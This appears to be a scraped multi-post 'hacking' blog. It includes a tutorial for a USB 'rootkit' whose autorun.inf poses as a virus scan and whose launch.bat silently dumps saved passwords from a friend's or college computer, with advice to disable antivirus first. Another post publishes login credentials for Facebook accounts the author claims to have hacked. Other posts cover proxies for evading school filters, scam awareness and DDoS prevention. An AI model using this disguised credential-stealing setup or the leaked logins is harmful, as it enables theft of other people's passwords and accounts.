This Blog should contain an information to HACKING & SECURITY . The "ETHICAL HACKING" site should include a perfect information of your work, aims and Goals.
Today I Will Tell You Latest Youtube Hacking Tricks.....Please If You Like Our Tricks Then Like Our Facebook Page and share our tricks On Your Timeline This Is our Credit.....
First Step Open Youtube And Copy Video Url.. Like.... http://www.youtube.com/watch?feature=player_detailpage&v=aYAOQGkE7AM
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
Sunday, October 26, 2014
Share Post
Shivam SrivastavaWeb Developer
Follow me on:
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
In your college or school they restrict to see some sites ? You can access without any restrictions using the proxy server.
What is Proxy?
Proxy server is some kind of a buffer between your computer and the
designated internet destination. When you use a proxy server , your
computer will send a request to the proxy server , then the proxy
server will send it to the destination (for example a website), the
destination will answer the request the proxy has sent and finally the
proxy will return the data to you computer.
Reasons for using proxy servers:
Proxy server is able to increase or decrease the speed of your
connection to the Internet depending on the location of the proxy
Proxy server ( but only anonymous) can hide your IP address (the
resource you visit will retrieve the IP of the proxy, and not your
Proxy servers can help in case some owner of an Internet resource
impose restrictions for users from certain countries ( for example
hulu.com is only reserved for those from United States, if you are not
from United States, you can’t watch videos on hulu.com)
How to Use:
open the proxy server site .
when you open the browser it will ask you to get the certificate.
so click "Get certificate "
and click "ok"
Now site will be opened
The website will ask you to enter the url of site.
enter url of site you want to visit .
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
Windows
stores most of the passwords which are used on a daily basis, including
instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger
etc. Along with these, Windows also stores passwords of Outlook Express,
SMTP, POP, FTP accounts and auto-complete passwords of many browsers
like IE and Firefox.
There
exists many tools for recovering these passswords from their stored
places. Using these tools and an USB pendrive you can create your own
rootkit to hack passwords from your friend’s/college Computer.
We need the following tools to create our rootkit. MessenPass: Recovers
the passwords of most popular Instant Messenger programs: MSN Messenger,
Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant
Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. Mail
PassView: Recovers the passwords of the following email programs:
Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only),
Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts),
IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail
Free.
Mail PassView can also recover the passwords of Web-based email accounts
(HotMail, Yahoo!, Gmail), if you use the associated programs of these
accounts. IE Passview: IE PassView is a small utility that reveals the
passwords stored by Internet Explorer browser. It supports the new
Internet Explorer 7.0, as well as older versions of Internet explorer,
v4.0 – v6.0 Protected Storage PassView: Recovers all passwords stored
inside the Protected Storage, including the AutoComplete passwords of
Internet Explorer, passwords of Password-protected sites, MSN Explorer
Passwords, and more… PasswordFox: PasswordFox is a small password
recovery tool that allows you to view the user names and passwords
stored by Mozilla Firefox Web browser
By default, PasswordFox displays the passwords stored in your current
profile, but you can easily select to watch the passwords of any other
Firefox profile. For each password entry, the following information is
displayed: Record Index, Web Site, User Name, Password, User Name Field,
Password Field, and the Signons filename. Here is a step by step
procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps. 1. Download all the 5 tools, extract them and copy only the
executables(.exe files) into your USB Pendrive. ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive. 2. Create a new Notepad and write the following text into it [autorun] open=launch.bat ACTION= Perform a Virus Scan save the Notepad
and rename it from New Text Document.txt to autorun.inf Now copy
theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it. start
mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start
iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start
passwordfox.exe /stext passwordfox.txt save the Notepad and rename it
from New Text Document.txt to launch.bat Copy the launch.bat
file also to your USB drive. Now your rootkit is ready and you are all
set to hack the passwords. You can use this pendrive on your friend’s PC
or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3.
Now all the password hacking tools will silently get executed in the
background (This process takes hardly a few seconds). The passwords get
stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer
How
To Sniff Passwords Using USB Drive,How To Sniff Passwords Using USB
Drive,HOW TO HACK PASSWORD USING USB DRIVE,Hack Passwords Using A Usb
Device,Hack Password Using Usb Flash Drive ,How To Hack Passwords Using
USB Drive,How To Hack Passwords Using A USB,How To Hack Saved Passwords
Using USB,How To Hack Passwords Through USB Drive,How To Make An
Auto-Hacking USB Drive,STEALLING PASSWORDS USING USB DRIVE.,Creating An
Auto Hack USB Drive Using Autorun And Batch Files,How To Hack Passwords
Using An USB Drive,How To Sniff Passwords Using USB Drive,Hack Passwords
Using USB Flash Drive,How To Hack Passwords Using Usb Drive
Softwares,Hack Passwords Using Pen Drive
Share Post
Shivam SrivastavaWeb Developer
Follow me on:
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
How to Bypass Facebook Checkpoint Hack [Remove Security Questions]
How
to Hack Facebook Checkpoint and get rigid of Facebook
Security Questions. I got about 23 request on Topic "How to Break the
Facebook Security Questions for easy Facebook Browsing" so I created
this post. Friends I don't have any Facebook Account. To show this
checkpoint problem I need a Account. So I Hacked some Account.
Account from Iran
eMail Address: shadykiller@hotmail.com
Password: 123456
Account from India [This account was hacked a different advanced method so i have to change the orginal password]
eMail Address: cyber_ninja@gmail.com
Password: 5555555
What is Facebook Checkpoint ?
It is New Facebook Security System. which helps facebook users from
hackers [bull shit. I hacked that Account shadykiller@hotmail.com]
When the Facebook Checkpoint is shown ?
When
ever a Facebook user browsers Facebook from a different IP
address than he usually does the facebook checkpoint is shown. Even if
his web browser is changed facebook check point is shown I think this
is stupid. Limited number of users have a Static IP Address.
For what the Facebook Security Questions are Shown?
If you login in to your Facebook Account from different Browser
If you login in to your Facebook Account from different Location
If you login in to your Facebook Account from different Computer
If you are trying to login from multiple Account
What Type of Security Questions are shown ?
Upload Photo ID [your goverment ID card must be uploaded to access facebook]
Identify the People tagged you [5 Photos]
Identify Friends Photo [5 Photos]
login from recent logged computers [you can't login from this computer]
Use your Mobile Number
Answer your security questions
Much More
I am using the above the above given eMail Address and Password to Login
Removing Identify the People Tagged you Checkpoint [eMail: shadykiller@hotmail.com]
This
is shown because you logged in from different location or different
computer or even different browser. If you are tagged by other. there is
no option of other security questions
Below are the screenshot review of this Facebook Checkpoint [Click on the Screenshot to Zoom]
After you Click Start you should complete five photo tags
After
you complete all this you can access your account. Most of them can't
remember 3 month ago tags. Do you see the above screenshot of tags. the
middle tagged photo. what is it. whos photo is that. who tagged it.
no one can identify photos like that
If your
Account is Blocked like this and can't access. you can login in from
your mobile version of facebook [m.facebook.com] in mobile version of
facebook you birth dath is the security question. I f you know this
login in to your account and access your photos and see who tagged you
and then try to login from web version of facebook and give answer to
your tags
To get
remove this tag security checkpoint. Please tell your friends to not to
tag you or change your settings for tag [You can only tag yourself in a
photo]
Removing Identify Photos of Friend Checkpoint [eMail: cyber_ninja@gmail.com]
This
is shown because you logged in from different location or different
computer or even different browser. If you are tagged by other. there is
option of other security questions
Below are the screenshot review of this Facebook Checkpoint [Click on the Screenshot to Zoom]
If
you Make too many wrong answers this option will be removed and you
will have only two security questions. your Mobile number and Security
Questions. If you don't Have it or you have't added it. there is no
help for you you account is blocked. Below is a screenshot of too many
wrong answers
To
remove this type of security questions don't add friends or before
your account is blocked. try the above mentioned Mobile version trick
of facebook
Identify Photo ID Card [Anonymous]
Your are think why i named this facebook id as anonymous because it was a ladies profile. i can't expose her personal details. sorry.
This is shown because There are other Profiles with you Identity. Matching your profile. There is other option to recover
Below are the screenshot review of this Facebook Checkpoint [Click on the Screenshot to Zoom]
If
you can't pass this. Try to login from the Facebook Mentioned
computer with the same browser. If you IP Address is change [not a
static IP] you can't login in. your account is blocked permanently
To
remove this type of security questions. try the above mentioned Mobile
version trick of facebook. you can unlock this only if you know your
date of birth. If you don't know this your account is blocked.
Share Post
Shivam SrivastavaWeb Developer
Follow me on:
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
There
are so many fraudulent companies which are engaging peoples, those who
are willing to make money online. Offering them easy jobs like
Ad-posting, Form filling, Emails reading, Writing spam articles, Bogus
surveys, etc. Later ask people to register on their website by paying a
little registration fees (that little bucks make them rich). After all
paying nothing after the job has been done, by arguing work has not been
done in time or not properly.
Try
to get advice from family members, friends, co-workers before involving
in such an online jobs like "make money at home", "earn money without
leaving home" & many more like these eye catching phrases. People
often confused after visiting their stunning websites which includes Demo videos
how would you do it & earn a lot of money without leaving home. Do
some little research before applying and paying them on the search
engine by finding about scams. It will give you the best idea to pay or
not to pay.
Trying
to get rich online is not an easy task but need special attention and
focus. You need website to sell your products or services online. If you
have a website then you need to know how to attract the visitor to
raise traffic to your online business, website/store to get more sales.
Share Post
Shivam SrivastavaWeb Developer
Follow me on:
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
Usually, people get apps for their android device by downloading them from Google Play Store. The downloader gets the app installed
for you, without bothering you with unnecessary details like the files
required for installation etc. But what if you don’t have access to
internet and you want an app installed on your phone? Surely you can’t do so without downloading
stuff required for the installation. The solution to this problem is
simple - just get the APK package of the desired app, and keep it
beforehand for later when you need.
APK stands for Android Package. It’s actually a package which contains all the files necessary for installation. In other words, it’s a ‘standalone’ installer for your app which doesn’t require internet connectivity. You can get APK package of an android application from Google Play Store
by simply adding an extension called ‘APK Downloader’ to your Google
browser. Here we have a step by step procedure which will tell you how to add APK Downloader to your Google Chrome and subsequently, use it for getting APK packages
Download the extension from the link provided above
Once downloaded, the extension is to be added to your Google Chrome Extensions. To do so, follow these steps.
Go to the ‘Tools’ menu of your Chrome and select ‘Extensions’.
Locate the file you just downloaded (with extension ‘.crx’)
Now drag the file to your Extensions page.
For confirmation look for a small Play Store icon on your address bar
To configure the APK Downloader extension for your android device
Select the ‘options’ button on the menu
Enter the Gmail ID (the one required for Play Store)
Enter your password and device ID of your android device
For those of you who don’t know where to get device ID of your android device
Dial “*#*#8255#*#*” from your android phone
If you are using an android tablet
Go to Google Play Store
Download ‘Device ID’
Device ID will get your device ID for you.
Getting APK of an app
is simple, just locate the app you want (on Play Store) and clicking on
the APK icon on your address bar will get you your precious APK for that
app. Another good thing about APK package is that it makes app sharing
simple, now you can share an app with your friends by simply
transferring the package to their device.
The APK and APK Downloader will make your life a lot easier if you face problems in installing your favorite apps due to connectivity issues or if you like to share your favorite apps with your friends.
Did you find this post useful? Did you have any problems? For any query, please ask in the comments section below.Let's enjoy... :)
Share Post
Shivam SrivastavaWeb Developer
Follow me on:
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
Social networks are always great for communicative people; they make you
closer to your friends, relatives and hackers. Social networks are very
attractive for such kind of people. You can ask me: “Why do they need
that?” All they need is your account.
The fraud schemes may be different. But the main aim of them is money.
They can ask your relatives for help, especially when you’re far away.
Why shouldn’t they believe their own child, when he needs money?
Fraudsters do not disdain playing on the heartstrings. They can write
everything, that there’s an accident, you’re in a hospital, etc. So
today we’ll study to confront fraudsters and keep our nerves and money
safe.
Consequences
The most people don’t think about possible risks when creating their profile on social networks. The more personal and professional
information you give, the easier it is for fraudsters to rob you. Let
us discuss the easiest scheme. Some criminals are simply searching for
people living in the same city to plunder their houses. Why does it
happen? Different people are writing perfect information, like “We’re
going to visit California next
weekends. Hoping it’ll be great” Of course it will be great. For the
robber, because now he knows that the house will be empty during
weekends and it’s the perfect opportunity for him.
The second thing is the photos. When you’re downloading images and photos on social networks not only your friends like them. It’s also the perfect resource for burglars.
From home-made photos, they can receive information about your welfare
and house structure. When you have a dog, the robber will be prepared,
because everyone has photos with their home pets. That’s why we
earnestly advise you not to put in the Internet photos of your house,
and some things that can attract robbers, for instance your new car or a
brilliant ring.
Advice
The next our advice – create a complicated password. We’ve just discussed what fraudsters can do with the access to your account,
so try to protect yourself, your friends, and relatives as good as you
can. Don’t make a password consisting of just your birth date. Remember,
that it’s the first combination fraudsters try. Also, don’t put your
birth date as the answer to the test question if it’s mail. Check out
below article on password cracking.
Let us imagine that you have a complicated password, you don’t download the “rob-attractive” photos and one day you receive the link
from your friend where he asks you to vote for him. Stop now. This can
be a trap. If you’ll link, the fraudsters receive your personal data,
such as login and password. Such scheme is called “fishing”. So,
in this case, ask your friend something personal. The other variant is
just to make him a call and ask about this. If you’ll receive the answer
like “What are you talking about?” you should explain him that he was
hacked and offer to change the password. Check out below tutorial to
know about popular hacking method used to acquire sensitive information
about oneself.
Phones are really helpful things. Explain to your friends and relatives
that you can be hacked and if they receive messages with money requests,
they must call you at first and ask about that. Remember that your security is in your hands and be careful.
Share Post
Shivam SrivastavaWeb Developer
Follow me on:
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
Distributed denial-of-service (DDoS) attacks are always in top headlines
worldwide, as they are plaguing websites in banks, and virtually of
almost every organization having a prominent online presence. The main
cause behind the proliferation of DDoS attacks is that there is a very low-cost that the attacker has to incur to put such attack in motion.
Fortunately, today various prevention methods have been developed to
tackle such attacks. Before delving further into understanding about the
ways to prevent DDoS attack, let’s first understand what exactly a DDoS attack is!
Understanding DDOS Attack
A DDoS (distributed denial-of-service) attack is an attempt made by
attackers to make computers’ resources inaccessible to its anticipated
user. In order to carry out a DDOS attack the attackers never uses their
own system; rather they create a network of zombie computers often called as a “Botnet” – that is a hive of computers, to incapacitate a website or a web server.
Let’s understand the basic idea! Now, the attacker notifies all the
computers present on the botnet to keep in touch with a particular site
or a web server, time and again. This increases traffic on the network
that causes in slowing down the speed of a site for the intended users.
Unfortunately, at times the traffic can be really high that could even
lead to shutting a site completely.
3 Basic Tips to Prevent a DDoS Attack
There are several ways to prevent the DDOS attack; however, here in this guest post I’ll be covering three basic tips that will help you to protect your website from the DDoS attack.
1.Buy More Bandwidth.
One of the easiest methods is to ensure that you have sufficient
bandwidth on your web. You’ll be able to tackle lots of low-scale DDOS attacks simply by buying more bandwidth so as to service the
requests. How does it help? Well, distributed denial of service is a
nothing more than a game of capacity. Let’s suppose you have 10,000
computer systems each distributing 1 Mbps directed towards your way.
This means you’re getting 10 GB of data that is hitting your web server every second. Now, that’s causes a lot of traffic!
So to avoid such issue, you need to apply the same rule intended for
normal redundancy. According to this technique, if you wish to have more
web servers just multiply around diverse datacenters and next make use
of load balancing. By spreading your traffic to various servers will
help you balance the load and will most likely create large space adequate to handle the incessant increase in traffic.
However, there’s a problem with this method that is buying more
bandwidth can be a costly affair. And as you’ll know that the current DDoS attacks are getting large, and can be a lot bigger exceeding your budget limit.
2.Opt for DDoS Mitigation Services.
A lot of network or Internet-service providers render DDoS mitigation capabilities. Look for an internet service provider
having the largest DDoS protection and mitigation network, automated
tools, and a pool of talented anti-DDoS technicians with the wherewithal
to take action in real-time as per the varying DDoS attack
characteristics. A viable alternative is to utilize a DDoS prevention
appliance, which is specifically intended to discover and prevent
distributed denial-of-service attacks.
3.Restricted Connectivity.
In case you have computer systems that are connected to the web
directly, a better idea is to properly install/configure your routers
and firewall so as to limit the connectivity. For an instance, while
receiving some data from a client machine you can only allow traffic to
pass from the machine only on a few chosen ports (like HTTP, POP, SMTP
etc.) via the firewall.
Wrapping Up!
Websites are largely getting attacked by hackers every second.
Denial-of-service attack is insanely getting huge and is creating a lot
of problems for business organizations having strong online vicinity. In
this guest post you’ll not only understand what a DDoS attack actually means, but will also come to know about a few type of methods to prevent DDoS attacks.
Aforementioned are three tips that I’ll recommend you to run through to
at least understand where to get started towards building a resilient
web network with chances of surviving a DDoS attack.
Share Post
Shivam SrivastavaWeb Developer
Follow me on:
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
Every human discovery has pros and cons, so is the computer
which has pervaded all our lives. The modern humanity is increasingly
dependent on computer for various day-to-day activities. Computers do us
a whole lot of good things, but it is not without some pitfalls. With
the extensive use of internet for hundreds of our needs, computer opens a vicious cycle of hackers. Computer hacking is a term which refers to an individual’s illegal and unauthorized access to the data which are stored in a user’s system. This is done to disturb the confidentiality and security of the user’s computer.
The hackers focus on individuals’ computer system when they are online. As long as you are not connected to internet you are less prone to hacking. The access to internet has actually made computer hacking easy. You must protect your computer with strong antivirus and firewall programs to keep hackers away. Hackers are known for creating problems which are
difficult to solve. This gives a good business to computer
investigators and technicians. Hacking can be done in lots of ways. Few
of them are given below:
Worms: These are the programs which propagate through networks.
Trojans: These are hidden in websites, attached files and emails.
Viruses: These attach themselves to various kinds of files. They can damage certain functions of your computer.
Hackers also crash on wireless networks which do not have firewall
installed and enabled. They can also send email attachments with
malicious software which get embedded on the victim’s computer. Hackers
attack accounts which have weak passwords. All these are done to get access to
confidential and sensitive information of the users. Whatever is the
method of hacking, the effect is harmful for the user. Your system will
be flooded with viruses, malwares which steal your information. In order
to avoid hacking one has to make sure that the systems at home or
office have the latest anti-virus program and firewall installed and
enabled. These programs need to be regularly updated. Use the latest
browser and scan your computer on a regular basis.
New Age...
The New Age of internet has brought with it many risk factors along with
umpteen advantages. The New Age is the time where our personal lives
are no longer very personal, but people are able to access personal
information of internet users from various sources in the virtual world.
We need to be careful about usernames and passwords, else it will lead
to dangerous consequences. Universities, large companies and government
agencies are mostly targeted by hackers simply because of the bulk of
information they handle. The great newspapers like The Wall Street
Journal and The New York Times were also targeted by hackers.
Computer hackers are people who gain remote access to information stored in a system elsewhere. During the 1950s and 60s hackers were more drawn towards learning the operations of a computer rather than stealing confidential information of a remote user. Unlike the olden days, now computer hacking has become more sophisticated and organized. In the late 1990s hackers tried to get access to files in the network of Pentagon. Some more expert hackers gained access to
the patent files at the Indiana University School of Medicine in
February 2003. Many hackers were sentenced in the history since hacking
represents a potential national security threat.
Viruses
One major tool hackers use to steal information from computer systems is
the use of viruses. Over the years the number of viruses has increased
drastically. The virtual world now has above 100000 viruses and the
number grows virtually every day. Apart from the threat the computer hackers pose, they also can be beneficial in one way. They can bring to light the flaws in a computer
network. Hackers can help in redesigning the system and in making
information inaccessible to illegal users and to unauthorized access.
Getting Administrative Access
Getting a log in password is one of the predominant ways to get access to a computer which is by the side of the hacker. Getting remote access to a computer
is another way to hack a system. Managing to crack a Wi-Fi password is
the third method of sneaking into someone else’s system. Hacking if done
on a public or school computer will have serious consequences. The
hacker will be put behind the bars for illegally accessing the computer which does not belong to him or her.
Share Post
Shivam SrivastavaWeb Developer
Follow me on:
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.